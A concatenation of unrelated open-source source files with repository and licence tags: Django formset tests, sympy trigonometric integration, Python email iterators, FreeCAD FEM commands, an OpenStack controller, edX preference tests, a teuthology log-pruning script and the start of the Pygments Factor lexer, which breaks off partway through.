self.assertQuerysetEqual(formset.get_queryset(), [])
formset = PlayerInlineFormSet(instance=team)
players = formset.get_queryset()
self.assertEqual(len(players), 1)
player1, = players
self.assertEqual(player1.team, team)
self.assertEqual(player1.name, 'Bobby')
def test_model_formset_with_custom_pk(self):
# a formset for a Model that has a custom primary key that still needs to be
# added to the formset automatically
FormSet = modelformset_factory(ClassyMexicanRestaurant, fields=["tacos_are_yummy"])
self.assertEqual(sorted(FormSet().forms[0].fields.keys()), ['restaurant', 'tacos_are_yummy'])
def test_prevent_duplicates_from_with_the_same_formset(self):
FormSet = modelformset_factory(Product, extra=2)
data = {
'form-TOTAL_FORMS': 2,
'form-INITIAL_FORMS': 0,
'form-MAX_NUM_FORMS': '',
'form-0-slug': 'red_car',
'form-1-slug': 'red_car',
}
formset = FormSet(data)
self.assertFalse(formset.is_valid())
self.assertEqual(formset._non_form_errors,
['Please correct the duplicate data for slug.'])
FormSet = modelformset_factory(Price, extra=2)
data = {
'form-TOTAL_FORMS': 2,
'form-INITIAL_FORMS': 0,
'form-MAX_NUM_FORMS': '',
'form-0-price': '25',
'form-0-quantity': '7',
'form-1-price': '25',
'form-1-quantity': '7',
}
formset = FormSet(data)
self.assertFalse(formset.is_valid())
self.assertEqual(formset._non_form_errors,
['Please correct the duplicate data for price and quantity, which must be unique.'])
# Only the price field is specified, this should skip any unique checks since
# the unique_together is not fulfilled. This will fail with a KeyError if broken.
FormSet = modelformset_factory(Price, fields=("price",), extra=2)
data = {
'form-TOTAL_FORMS': '2',
'form-INITIAL_FORMS': '0',
'form-MAX_NUM_FORMS': '',
'form-0-price': '24',
'form-1-price': '24',
}
formset = FormSet(data)
self.assertTrue(formset.is_valid())
FormSet = inlineformset_factory(Author, Book, extra=0)
author = Author.objects.create(pk=1, name='Charles Baudelaire')
book1 = Book.objects.create(pk=1, author=author, title='Les Paradis Artificiels')
book2 = Book.objects.create(pk=2, author=author, title='Les Fleurs du Mal')
book3 = Book.objects.create(pk=3, author=author, title='Flowers of Evil')
book_ids = author.book_set.order_by('id').values_list('id', flat=True)
data = {
'book_set-TOTAL_FORMS': '2',
'book_set-INITIAL_FORMS': '2',
'book_set-MAX_NUM_FORMS': '',
'book_set-0-title': 'The 2008 Election',
'book_set-0-author': str(author.id),
'book_set-0-id': str(book_ids[0]),
'book_set-1-title': 'The 2008 Election',
'book_set-1-author': str(author.id),
'book_set-1-id': str(book_ids[1]),
}
formset = FormSet(data=data, instance=author)
self.assertFalse(formset.is_valid())
self.assertEqual(formset._non_form_errors,
['Please correct the duplicate data for title.'])
self.assertEqual(formset.errors,
[{}, {'__all__': ['Please correct the duplicate values below.']}])
FormSet = modelformset_factory(Post, extra=2)
data = {
'form-TOTAL_FORMS': '2',
'form-INITIAL_FORMS': '0',
'form-MAX_NUM_FORMS': '',
'form-0-title': 'blah',
'form-0-slug': 'Morning',
'form-0-subtitle': 'foo',
'form-0-posted': '2009-01-01',
'form-1-title': 'blah',
'form-1-slug': 'Morning in Prague',
'form-1-subtitle': 'rawr',
'form-1-posted': '2009-01-01'
}
formset = FormSet(data)
self.assertFalse(formset.is_valid())
self.assertEqual(formset._non_form_errors,
['Please correct the duplicate data for title which must be unique for the date in posted.'])
self.assertEqual(formset.errors,
[{}, {'__all__': ['Please correct the duplicate values below.']}])
data = {
'form-TOTAL_FORMS': '2',
'form-INITIAL_FORMS': '0',
'form-MAX_NUM_FORMS': '',
'form-0-title': 'foo',
'form-0-slug': 'Morning in Prague',
'form-0-subtitle': 'foo',
'form-0-posted': '2009-01-01',
'form-1-title': 'blah',
'form-1-slug': 'Morning in Prague',
'form-1-subtitle': 'rawr',
'form-1-posted': '2009-08-02'
}
formset = FormSet(data)
self.assertFalse(formset.is_valid())
self.assertEqual(formset._non_form_errors,
['Please correct the duplicate data for slug which must be unique for the year in posted.'])
data = {
'form-TOTAL_FORMS': '2',
'form-INITIAL_FORMS': '0',
'form-MAX_NUM_FORMS': '',
'form-0-title': 'foo',
'form-0-slug': 'Morning in Prague',
'form-0-subtitle': 'rawr',
'form-0-posted': '2008-08-01',
'form-1-title': 'blah',
'form-1-slug': 'Prague',
'form-1-subtitle': 'rawr',
'form-1-posted': '2009-08-02'
}
formset = FormSet(data)
self.assertFalse(formset.is_valid())
self.assertEqual(formset._non_form_errors,
['Please correct the duplicate data for subtitle which must be unique for the month in posted.'])
| agpl-3.0 |
hargup/sympy | sympy/integrals/trigonometry.py | 83 | 10631 | # -*- coding: utf-8 -*-
from __future__ import print_function, division
from sympy.core.compatibility import range
from sympy.core import cacheit, Dummy, Eq, Integer, Rational, S, Wild
from sympy.functions import binomial, sin, cos, Piecewise
# TODO sin(a*x)*cos(b*x) -> sin((a+b)x) + sin((a-b)x) ?
# creating, each time, Wild's and sin/cos/Mul is expensive. Also, our match &
# subs are very slow when not cached, and if we create Wild each time, we
# effectively block caching.
#
# so we cache the pattern
# need to use a function instead of lamda since hash of lambda changes on
# each call to _pat_sincos
def _integer_instance(n):
return isinstance(n , Integer)
@cacheit
def _pat_sincos(x):
a = Wild('a', exclude=[x])
n, m = [Wild(s, exclude=[x], properties=[_integer_instance])
for s in 'nm']
pat = sin(a*x)**n * cos(a*x)**m
return pat, a, n, m
_u = Dummy('u')
def trigintegrate(f, x, conds='piecewise'):
"""Integrate f = Mul(trig) over x
>>> from sympy import Symbol, sin, cos, tan, sec, csc, cot
>>> from sympy.integrals.trigonometry import trigintegrate
>>> from sympy.abc import x
>>> trigintegrate(sin(x)*cos(x), x)
sin(x)**2/2
>>> trigintegrate(sin(x)**2, x)
x/2 - sin(x)*cos(x)/2
>>> trigintegrate(tan(x)*sec(x), x)
1/cos(x)
>>> trigintegrate(sin(x)*tan(x), x)
-log(sin(x) - 1)/2 + log(sin(x) + 1)/2 - sin(x)
http://en.wikibooks.org/wiki/Calculus/Integration_techniques
See Also
========
sympy.integrals.integrals.Integral.doit
sympy.integrals.integrals.Integral
"""
from sympy.integrals.integrals import integrate
pat, a, n, m = _pat_sincos(x)
f = f.rewrite('sincos')
M = f.match(pat)
if M is None:
return
n, m = M[n], M[m]
if n is S.Zero and m is S.Zero:
return x
zz = x if n is S.Zero else S.Zero
a = M[a]
if n.is_odd or m.is_odd:
u = _u
n_, m_ = n.is_odd, m.is_odd
# take smallest n or m -- to choose simplest substitution
if n_ and m_:
n_ = n_ and (n < m) # NB: careful here, one of the
m_ = m_ and not (n < m) # conditions *must* be true
# n m u=C (n-1)/2 m
# S(x) * C(x) dx --> -(1-u^2) * u du
if n_:
ff = -(1 - u**2)**((n - 1)/2) * u**m
uu = cos(a*x)
# n m u=S n (m-1)/2
# S(x) * C(x) dx --> u * (1-u^2) du
elif m_:
ff = u**n * (1 - u**2)**((m - 1)/2)
uu = sin(a*x)
fi = integrate(ff, u) # XXX cyclic deps
fx = fi.subs(u, uu)
if conds == 'piecewise':
return Piecewise((zz, Eq(a, 0)), (fx / a, True))
return fx / a
# n & m are both even
#
# 2k 2m 2l 2l
# we transform S (x) * C (x) into terms with only S (x) or C (x)
#
# example:
# 100 4 100 2 2 100 4 2
# S (x) * C (x) = S (x) * (1-S (x)) = S (x) * (1 + S (x) - 2*S (x))
#
# 104 102 100
# = S (x) - 2*S (x) + S (x)
# 2k
# then S is integrated with recursive formula
# take largest n or m -- to choose simplest substitution
n_ = (abs(n) > abs(m))
m_ = (abs(m) > abs(n))
res = S.Zero
if n_:
# 2k 2 k i 2i
# C = (1 - S ) = sum(i, (-) * B(k, i) * S )
if m > 0:
for i in range(0, m//2 + 1):
res += ((-1)**i * binomial(m//2, i) *
_sin_pow_integrate(n + 2*i, x))
elif m == 0:
res = _sin_pow_integrate(n, x)
else:
# m < 0 , |n| > |m|
# /
# |
# | m n
# | cos (x) sin (x) dx =
# |
# |
#/
# /
# |
# -1 m+1 n-1 n - 1 | m+2 n-2
# ________ cos (x) sin (x) + _______ | cos (x) sin (x) dx
# |
# m + 1 m + 1 |
# /
res = (Rational(-1, m + 1) * cos(x)**(m + 1) * sin(x)**(n - 1) +
Rational(n - 1, m + 1) *
trigintegrate(cos(x)**(m + 2)*sin(x)**(n - 2), x))
elif m_:
# 2k 2 k i 2i
# S = (1 - C ) = sum(i, (-) * B(k, i) * C )
if n > 0:
# / /
# | |
# | m n | -m n
# | cos (x)*sin (x) dx or | cos (x) * sin (x) dx
# | |
# / /
#
# |m| > |n| ; m, n >0 ; m, n belong to Z - {0}
# n 2
# sin (x) term is expanded here in terms of cos (x),
# and then integrated.
#
for i in range(0, n//2 + 1):
res += ((-1)**i * binomial(n//2, i) *
_cos_pow_integrate(m + 2*i, x))
elif n == 0:
# /
# |
# | 1
# | _ _ _
# | m
# | cos (x)
# /
#
res = _cos_pow_integrate(m, x)
else:
# n < 0 , |m| > |n|
# /
# |
# | m n
# | cos (x) sin (x) dx =
# |
# |
#/
# /
# |
# 1 m-1 n+1 m - 1 | m-2 n+2
# _______ cos (x) sin (x) + _______ | cos (x) sin (x) dx
# |
# n + 1 n + 1 |
# /
res = (Rational(1, n + 1) * cos(x)**(m - 1)*sin(x)**(n + 1) +
Rational(m - 1, n + 1) *
trigintegrate(cos(x)**(m - 2)*sin(x)**(n + 2), x))
else:
if m == n:
##Substitute sin(2x)/2 for sin(x)cos(x) and then Integrate.
res = integrate((Rational(1, 2)*sin(2*x))**m, x)
elif (m == -n):
if n < 0:
# Same as the scheme described above.
# the function argument to integrate in the end will
# be 1 , this cannot be integrated by trigintegrate.
# Hence use sympy.integrals.integrate.
res = (Rational(1, n + 1) * cos(x)**(m - 1) * sin(x)**(n + 1) +
Rational(m - 1, n + 1) *
integrate(cos(x)**(m - 2) * sin(x)**(n + 2), x))
else:
res = (Rational(-1, m + 1) * cos(x)**(m + 1) * sin(x)**(n - 1) +
Rational(n - 1, m + 1) *
integrate(cos(x)**(m + 2)*sin(x)**(n - 2), x))
if conds == 'piecewise':
return Piecewise((zz, Eq(a, 0)), (res.subs(x, a*x) / a, True))
return res.subs(x, a*x) / a
def _sin_pow_integrate(n, x):
if n > 0:
if n == 1:
#Recursion break
return -cos(x)
# n > 0
# / /
# | |
# | n -1 n-1 n - 1 | n-2
# | sin (x) dx = ______ cos (x) sin (x) + _______ | sin (x) dx
# | |
# | n n |
#/ /
#
#
return (Rational(-1, n) * cos(x) * sin(x)**(n - 1) +
Rational(n - 1, n) * _sin_pow_integrate(n - 2, x))
if n < 0:
if n == -1:
##Make sure this does not come back here again.
##Recursion breaks here or at n==0.
return trigintegrate(1/sin(x), x)
# n < 0
# / /
# | |
# | n 1 n+1 n + 2 | n+2
# | sin (x) dx = _______ cos (x) sin (x) + _______ | sin (x) dx
# | |
# | n + 1 n + 1 |
#/ /
#
return (Rational(1, n + 1) * cos(x) * sin(x)**(n + 1) +
Rational(n + 2, n + 1) * _sin_pow_integrate(n + 2, x))
else:
#n == 0
#Recursion break.
return x
def _cos_pow_integrate(n, x):
if n > 0:
if n == 1:
#Recursion break.
return sin(x)
# n > 0
# / /
# | |
# | n 1 n-1 n - 1 | n-2
# | sin (x) dx = ______ sin (x) cos (x) + _______ | cos (x) dx
# | |
# | n n |
#/ /
#
return (Rational(1, n) * sin(x) * cos(x)**(n - 1) +
Rational(n - 1, n) * _cos_pow_integrate(n - 2, x))
if n < 0:
if n == -1:
##Recursion break
return trigintegrate(1/cos(x), x)
# n < 0
# / /
# | |
# | n -1 n+1 n + 2 | n+2
# | cos (x) dx = _______ sin (x) cos (x) + _______ | cos (x) dx
# | |
# | n + 1 n + 1 |
#/ /
#
return (Rational(-1, n + 1) * sin(x) * cos(x)**(n + 1) +
Rational(n + 2, n + 1) * _cos_pow_integrate(n + 2, x))
else:
# n == 0
#Recursion Break.
return x
| bsd-3-clause |
buqing2009/MissionPlanner | Lib/email/iterators.py | 68 | 2275 | # Copyright (C) 2001-2006 Python Software Foundation
# Author: Barry Warsaw
# Contact: [email protected]
"""Various types of useful iterators and generators."""
__all__ = [
'body_line_iterator',
'typed_subpart_iterator',
'walk',
# Do not include _structure() since it's part of the debugging API.
]
import sys
from cStringIO import StringIO
# This function will become a method of the Message class
def walk(self):
"""Walk over the message tree, yielding each subpart.
The walk is performed in depth-first order. This method is a
generator.
"""
yield self
if self.is_multipart():
for subpart in self.get_payload():
for subsubpart in subpart.walk():
yield subsubpart
# These two functions are imported into the Iterators.py interface module.
def body_line_iterator(msg, decode=False):
"""Iterate over the parts, returning string payloads line-by-line.
Optional decode (default False) is passed through to .get_payload().
"""
for subpart in msg.walk():
payload = subpart.get_payload(decode=decode)
if isinstance(payload, basestring):
for line in StringIO(payload):
yield line
def typed_subpart_iterator(msg, maintype='text', subtype=None):
"""Iterate over the subparts with a given MIME type.
Use `maintype' as the main MIME type to match against; this defaults to
"text". Optional `subtype' is the MIME subtype to match against; if
omitted, only the main type is matched.
"""
for subpart in msg.walk():
if subpart.get_content_maintype() == maintype:
if subtype is None or subpart.get_content_subtype() == subtype:
yield subpart
def _structure(msg, fp=None, level=0, include_default=False):
"""A handy debugging aid"""
if fp is None:
fp = sys.stdout
tab = ' ' * (level * 4)
print >> fp, tab + msg.get_content_type(),
if include_default:
print >> fp, '[%s]' % msg.get_default_type()
else:
print >> fp
if msg.is_multipart():
for subpart in msg.get_payload():
_structure(subpart, fp, level+1, include_default)
| gpl-3.0 |
maurerpe/FreeCAD | src/Mod/Fem/FemCommands.py | 3 | 6302 | #***************************************************************************
#* *
#* Copyright (c) 2015 - FreeCAD Developers *
#* Author (c) 2015 - Przemo Fiszt < [email protected]> *
#* *
#* This program is free software; you can redistribute it and/or modify *
#* it under the terms of the GNU Lesser General Public License (LGPL) *
#* as published by the Free Software Foundation; either version 2 of *
#* the License, or (at your option) any later version. *
#* for detail see the LICENCE text file. *
#* *
#* This program is distributed in the hope that it will be useful, *
#* but WITHOUT ANY WARRANTY; without even the implied warranty of *
#* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the *
#* GNU Library General Public License for more details. *
#* *
#* You should have received a copy of the GNU Library General Public *
#* License along with this program; if not, write to the Free Software *
#* Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 *
#* USA *
#* *
#***************************************************************************
__title__ = "Fem Commands"
__author__ = "Przemo Firszt"
__url__ = "http://www.freecadweb.org"
import FreeCAD
if FreeCAD.GuiUp:
import FreeCADGui
import FemGui
from PySide import QtCore
class FemCommands(object):
def __init__(self):
self.resources = {'Pixmap': 'fem-frequency-analysis',
'MenuText': QtCore.QT_TRANSLATE_NOOP("Fem_Command", "Default Fem Command MenuText"),
'Accel': "",
'ToolTip': QtCore.QT_TRANSLATE_NOOP("Fem_Command", "Default Fem Command ToolTip")}
#FIXME add option description
self.is_active = None
def GetResources(self):
return self.resources
def IsActive(self):
if not self.is_active:
active = False
elif self.is_active == 'with_document':
active = FreeCADGui.ActiveDocument is not None
elif self.is_active == 'with_analysis':
active = FemGui.getActiveAnalysis() is not None and self.active_analysis_in_active_doc()
elif self.is_active == 'with_results':
active = FemGui.getActiveAnalysis() is not None and self.active_analysis_in_active_doc() and self.results_present()
elif self.is_active == 'with_part_feature':
active = FreeCADGui.ActiveDocument is not None and self.part_feature_selected()
elif self.is_active == 'with_solver':
active = FemGui.getActiveAnalysis() is not None and self.active_analysis_in_active_doc() and self.solver_selected()
elif self.is_active == 'with_analysis_without_solver':
active = FemGui.getActiveAnalysis() is not None and self.active_analysis_in_active_doc() and not self.analysis_has_solver()
return active
def results_present(self):
results = False
analysis_members = FemGui.getActiveAnalysis().Member
for o in analysis_members:
if o.isDerivedFrom('Fem::FemResultObject'):
results = True
return results
def part_feature_selected(self):
sel = FreeCADGui.Selection.getSelection()
if len(sel) == 1 and sel[0].isDerivedFrom("Part::Feature"):
return True
else:
return False
def active_analysis_in_active_doc(self):
return FemGui.getActiveAnalysis().Document is FreeCAD.ActiveDocument
def solver_selected(self):
sel = FreeCADGui.Selection.getSelection()
if len(sel) == 1 and sel[0].isDerivedFrom("Fem::FemSolverObjectPython"):
return True
else:
return False
def analysis_has_solver(self):
solver = False
analysis_members = FemGui.getActiveAnalysis().Member
for o in analysis_members:
if o.isDerivedFrom("Fem::FemSolverObjectPython"):
solver = True
if solver is True:
return True
else:
return False
def hide_parts_constraints_show_meshes(self):
if FreeCAD.GuiUp:
for acnstrmesh in FemGui.getActiveAnalysis().Member:
#if "Constraint" in acnstrmesh.TypeId:
# acnstrmesh.ViewObject.Visibility = False
if "Mesh" in acnstrmesh.TypeId:
aparttoshow = acnstrmesh.Name.replace("_Mesh", "")
for apart in FreeCAD.activeDocument().Objects:
if aparttoshow == apart.Name:
apart.ViewObject.Visibility = False
acnstrmesh.ViewObject.Visibility = True # OvG: Hide constraints and parts and show meshes
def hide_meshes_show_parts_constraints(self):
if FreeCAD.GuiUp:
for acnstrmesh in FemGui.getActiveAnalysis().Member:
if "Constraint" in acnstrmesh.TypeId:
acnstrmesh.ViewObject.Visibility = True
if "Mesh" in acnstrmesh.TypeId:
aparttoshow = acnstrmesh.Name.replace("_Mesh", "")
for apart in FreeCAD.activeDocument().Objects:
if aparttoshow == apart.Name:
apart.ViewObject.Visibility = True
acnstrmesh.ViewObject.Visibility = False # OvG: Hide meshes and show constraints and meshed part e.g. on purging results
| lgpl-2.1 |
spjmurray/openstack-sentinel | sentinel/api/controllers/network/v2/floatingips.py | 1 | 1120 | # Copyright 2017 DataCentred Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import pecan
import pecan.decorators
from sentinel.api.controllers.base import BaseController
from sentinel.scope import Scope
class NetworkV2FloatingipsController(BaseController):
service = u'network'
resource = u'floatingip'
collection = u'floatingips'
@pecan.expose('json')
@pecan.decorators.accept_noncanonical
def get_all(self):
floatingips = Scope.filter(self.network.list_floatingips())
return self.format_collection(floatingips, links=False)
# vi: ts=4 et:
| apache-2.0 |
xiandiancloud/ji | common/djangoapps/user_api/tests/test_models.py | 52 | 1757 | from django.db import IntegrityError
from django.test import TestCase
from student.tests.factories import UserFactory
from user_api.tests.factories import UserPreferenceFactory
from user_api.models import UserPreference
class UserPreferenceModelTest(TestCase):
def test_duplicate_user_key(self):
user = UserFactory.create()
UserPreferenceFactory.create(user=user, key="testkey", value="first")
self.assertRaises(
IntegrityError,
UserPreferenceFactory.create,
user=user,
key="testkey",
value="second"
)
def test_arbitrary_values(self):
user = UserFactory.create()
UserPreferenceFactory.create(user=user, key="testkey0", value="")
UserPreferenceFactory.create(user=user, key="testkey1", value="This is some English text!")
UserPreferenceFactory.create(user=user, key="testkey2", value="{'some': 'json'}")
UserPreferenceFactory.create(
user=user,
key="testkey3",
value="\xe8\xbf\x99\xe6\x98\xaf\xe4\xb8\xad\xe5\x9b\xbd\xe6\x96\x87\xe5\xad\x97'"
)
def test_get_set_preference(self):
# Checks that you can set a preference and get that preference later
# Also, tests that no preference is returned for keys that are not set
user = UserFactory.create()
key = 'testkey'
value = 'testvalue'
# does a round trip
UserPreference.set_preference(user, key, value)
pref = UserPreference.get_preference(user, key)
self.assertEqual(pref, value)
# get preference for key that doesn't exist for user
pref = UserPreference.get_preference(user, 'testkey_none')
self.assertIsNone(pref)
| agpl-3.0 |
caibo2014/teuthology | teuthology/prune.py | 3 | 4784 | import logging
import os
import shutil
import time
import teuthology
from teuthology.contextutil import safe_while
log = logging.getLogger(__name__)
# If we see this in any directory, we do not prune it
PRESERVE_FILE = '.preserve'
def main(args):
"""
Main function; parses args and calls prune_archive()
"""
verbose = args['--verbose']
if verbose:
teuthology.log.setLevel(logging.DEBUG)
archive_dir = args['--archive']
dry_run = args['--dry-run']
pass_days = int(args['--pass'])
remotes_days = int(args['--remotes'])
prune_archive(archive_dir, pass_days, remotes_days, dry_run)
def prune_archive(archive_dir, pass_days, remotes_days, dry_run=False):
"""
Walk through the archive_dir, calling the cleanup functions to process
directories that might be old enough
"""
max_days = max(pass_days, remotes_days)
run_dirs = list()
log.debug("Archive {archive} has {count} children".format(
archive=archive_dir, count=len(os.listdir(archive_dir))))
for child in listdir(archive_dir):
item = os.path.join(archive_dir, child)
# Ensure that the path is not a symlink, is a directory, and is old
# enough to process
if (not os.path.islink(item) and os.path.isdir(item) and
is_old_enough(item, max_days)):
run_dirs.append(item)
for run_dir in run_dirs:
log.debug("Processing %s ..." % run_dir)
maybe_remove_passes(run_dir, pass_days, dry_run)
maybe_remove_remotes(run_dir, remotes_days, dry_run)
def listdir(path):
with safe_while(sleep=1, increment=1, tries=10) as proceed:
while proceed():
try:
return os.listdir(path)
except OSError:
log.exception("Failed to list %s !" % path)
def should_preserve(dir_name):
"""
Should the directory be preserved?
:returns: True if the directory contains a file named '.preserve'; False
otherwise
"""
preserve_path = os.path.join(dir_name, PRESERVE_FILE)
if os.path.isdir(dir_name) and os.path.exists(preserve_path):
return True
return False
def is_old_enough(file_name, days):
"""
:returns: True if the file's modification date is earlier than the amount
of days specified
"""
now = time.time()
secs_to_days = lambda s: s / (60 * 60 * 24)
age = now - os.path.getmtime(file_name)
if secs_to_days(age) > days:
return True
return False
def remove(path):
"""
Attempt to recursively remove a directory. If an OSError is encountered,
log it and continue.
"""
try:
shutil.rmtree(path)
except OSError:
log.exception("Failed to remove %s !" % path)
def maybe_remove_passes(run_dir, days, dry_run=False):
"""
Remove entire job log directories if they are old enough and the job passed
"""
if days < 0:
return
contents = listdir(run_dir)
if PRESERVE_FILE in contents:
return
for child in contents:
item = os.path.join(run_dir, child)
# Ensure the path isn't marked for preservation, that it is a
# directory, and that it is old enough
if (should_preserve(item) or not os.path.isdir(item) or not
is_old_enough(item, days)):
continue
# Is it a job dir?
summary_path = os.path.join(item, 'summary.yaml')
if not os.path.exists(summary_path):
continue
# Is it a passed job?
summary_lines = [line.strip() for line in
file(summary_path).readlines()]
if 'success: true' in summary_lines:
log.info("{job} is a {days}-day old passed job; removing".format(
job=item, days=days))
if not dry_run:
remove(item)
def maybe_remove_remotes(run_dir, days, dry_run=False):
"""
Remove remote logs (not teuthology logs) from job directories if they are
old enough
"""
if days < 0:
return
contents = listdir(run_dir)
if PRESERVE_FILE in contents:
return
for child in contents:
item = os.path.join(run_dir, child)
# Ensure the path isn't marked for preservation, that it is a
# directory, and that it is old enough
if (should_preserve(item) or not os.path.isdir(item) or not
is_old_enough(item, days)):
continue
# Does it have a remote subdir?
remote_path = os.path.join(item, 'remote')
if not os.path.isdir(remote_path):
continue
log.info("{job} is {days} days old; removing remote logs".format(
job=item, days=days))
if not dry_run:
remove(remote_path)
| mit |
lucywyman/slides-ii | v/lib/python2.7/site-packages/pygments/lexers/factor.py | 72 | 17864 | # -*- coding: utf-8 -*-
"""
pygments.lexers.factor
~~~~~~~~~~~~~~~~~~~~~~
Lexers for the Factor language.
:copyright: Copyright 2006-2014 by the Pygments team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
import re
from pygments.lexer import RegexLexer, bygroups, default, words
from pygments.token import Text, Comment, Keyword, Name, String, Number
__all__ = ['FactorLexer']
class FactorLexer(RegexLexer):
"""
Lexer for the `Factor <http://factorcode.org>`_ language.
.. versionadded:: 1.4
"""
name = 'Factor'
aliases = ['factor']
filenames = ['*.factor']
mimetypes = ['text/x-factor']
flags = re.MULTILINE | re.UNICODE
builtin_kernel = words((
'-rot', '2bi', '2bi@', '2bi*', '2curry', '2dip', '2drop', '2dup', '2keep', '2nip',
'2over', '2tri', '2tri@', '2tri*', '3bi', '3curry', '3dip', '3drop', '3dup', '3keep',
'3tri', '4dip', '4drop', '4dup', '4keep', '<wrapper>', '=', '>boolean', 'clone',
'?', '?execute', '?if', 'and', 'assert', 'assert=', 'assert?', 'bi', 'bi-curry',
'bi-curry@', 'bi-curry*', 'bi@', 'bi*', 'boa', 'boolean', 'boolean?', 'both?',
'build', 'call', 'callstack', 'callstack>array', 'callstack?', 'clear', '(clone)',
'compose', 'compose?', 'curry', 'curry?', 'datastack', 'die', 'dip', 'do', 'drop',
'dup', 'dupd', 'either?', 'eq?', 'equal?', 'execute', 'hashcode', 'hashcode*',
'identity-hashcode', 'identity-tuple', 'identity-tuple?', 'if', 'if*',
'keep', 'loop', 'most', 'new', 'nip', 'not', 'null', 'object', 'or', 'over',
'pick', 'prepose', 'retainstack', 'rot', 'same?', 'swap', 'swapd', 'throw',
'tri', 'tri-curry', 'tri-curry@', 'tri-curry*', 'tri@', 'tri*', 'tuple',
'tuple?', 'unless', 'unless*', 'until', 'when', 'when*', 'while', 'with',
'wrapper', 'wrapper?', 'xor'), suffix=r'\s')
builtin_assocs = words((
'2cache', '<enum>', '>alist', '?at', '?of', 'assoc', 'assoc-all?',
'assoc-any?', 'assoc-clone-like', 'assoc-combine', 'assoc-diff',
'assoc-diff!', 'assoc-differ', 'assoc-each', 'assoc-empty?',
'assoc-filter', 'assoc-filter!', 'assoc-filter-as', 'assoc-find',
'assoc-hashcode', 'assoc-intersect', 'assoc-like', 'assoc-map',
'assoc-map-as', 'assoc-partition', 'assoc-refine', 'assoc-size',
'assoc-stack', 'assoc-subset?', 'assoc-union', 'assoc-union!',
'assoc=', 'assoc>map', 'assoc?', 'at', 'at+', 'at*', 'cache', 'change-at',
'clear-assoc', 'delete-at', 'delete-at*', 'enum', 'enum?', 'extract-keys',
'inc-at', 'key?', 'keys', 'map>assoc', 'maybe-set-at', 'new-assoc', 'of',
'push-at', 'rename-at', 'set-at', 'sift-keys', 'sift-values', 'substitute',
'unzip', 'value-at', 'value-at*', 'value?', 'values', 'zip'), suffix=r'\s')
builtin_combinators = words((
'2cleave', '2cleave>quot', '3cleave', '3cleave>quot', '4cleave',
'4cleave>quot', 'alist>quot', 'call-effect', 'case', 'case-find',
'case>quot', 'cleave', 'cleave>quot', 'cond', 'cond>quot', 'deep-spread>quot',
'execute-effect', 'linear-case-quot', 'no-case', 'no-case?', 'no-cond',
'no-cond?', 'recursive-hashcode', 'shallow-spread>quot', 'spread',
'to-fixed-point', 'wrong-values', 'wrong-values?'), suffix=r'\s')
builtin_math = words((
'-', '/', '/f', '/i', '/mod', '2/', '2^', '<', '<=', '<fp-nan>', '>',
'>=', '>bignum', '>fixnum', '>float', '>integer', '(all-integers?)',
'(each-integer)', '(find-integer)', '*', '+', '?1+',
'abs', 'align', 'all-integers?', 'bignum', 'bignum?', 'bit?', 'bitand',
'bitnot', 'bitor', 'bits>double', 'bits>float', 'bitxor', 'complex',
'complex?', 'denominator', 'double>bits', 'each-integer', 'even?',
'find-integer', 'find-last-integer', 'fixnum', 'fixnum?', 'float',
'float>bits', 'float?', 'fp-bitwise=', 'fp-infinity?', 'fp-nan-payload',
'fp-nan?', 'fp-qnan?', 'fp-sign', 'fp-snan?', 'fp-special?',
'if-zero', 'imaginary-part', 'integer', 'integer>fixnum',
'integer>fixnum-strict', 'integer?', 'log2', 'log2-expects-positive',
'log2-expects-positive?', 'mod', 'neg', 'neg?', 'next-float',
'next-power-of-2', 'number', 'number=', 'number?', 'numerator', 'odd?',
'out-of-fixnum-range', 'out-of-fixnum-range?', 'power-of-2?',
'prev-float', 'ratio', 'ratio?', 'rational', 'rational?', 'real',
'real-part', 'real?', 'recip', 'rem', 'sgn', 'shift', 'sq', 'times',
'u<', 'u<=', 'u>', 'u>=', 'unless-zero', 'unordered?', 'when-zero',
'zero?'), suffix=r'\s')
builtin_sequences = words((
'1sequence', '2all?', '2each', '2map', '2map-as', '2map-reduce', '2reduce',
'2selector', '2sequence', '3append', '3append-as', '3each', '3map', '3map-as',
'3sequence', '4sequence', '<repetition>', '<reversed>', '<slice>', '?first',
'?last', '?nth', '?second', '?set-nth', 'accumulate', 'accumulate!',
'accumulate-as', 'all?', 'any?', 'append', 'append!', 'append-as',
'assert-sequence', 'assert-sequence=', 'assert-sequence?',
'binary-reduce', 'bounds-check', 'bounds-check?', 'bounds-error',
'bounds-error?', 'but-last', 'but-last-slice', 'cartesian-each',
'cartesian-map', 'cartesian-product', 'change-nth', 'check-slice',
'check-slice-error', 'clone-like', 'collapse-slice', 'collector',
'collector-for', 'concat', 'concat-as', 'copy', 'count', 'cut', 'cut-slice',
'cut*', 'delete-all', 'delete-slice', 'drop-prefix', 'each', 'each-from',
'each-index', 'empty?', 'exchange', 'filter', 'filter!', 'filter-as', 'find',
'find-from', 'find-index', 'find-index-from', 'find-last', 'find-last-from',
'first', 'first2', 'first3', 'first4', 'flip', 'follow', 'fourth', 'glue', 'halves',
'harvest', 'head', 'head-slice', 'head-slice*', 'head*', 'head?',
'if-empty', 'immutable', 'immutable-sequence', 'immutable-sequence?',
'immutable?', 'index', 'index-from', 'indices', 'infimum', 'infimum-by',
'insert-nth', 'interleave', 'iota', 'iota-tuple', 'iota-tuple?', 'join',
'join-as', 'last', 'last-index', 'last-index-from', 'length', 'lengthen',
'like', 'longer', 'longer?', 'longest', 'map', 'map!', 'map-as', 'map-find',
'map-find-last', 'map-index', 'map-integers', 'map-reduce', 'map-sum',
'max-length', 'member-eq?', 'member?', 'midpoint@', 'min-length',
'mismatch', 'move', 'new-like', 'new-resizable', 'new-sequence',
'non-negative-integer-expected', 'non-negative-integer-expected?',
'nth', 'nths', 'pad-head', 'pad-tail', 'padding', 'partition', 'pop', 'pop*',
'prefix', 'prepend', 'prepend-as', 'produce', 'produce-as', 'product', 'push',
'push-all', 'push-either', 'push-if', 'reduce', 'reduce-index', 'remove',
'remove!', 'remove-eq', 'remove-eq!', 'remove-nth', 'remove-nth!', 'repetition',
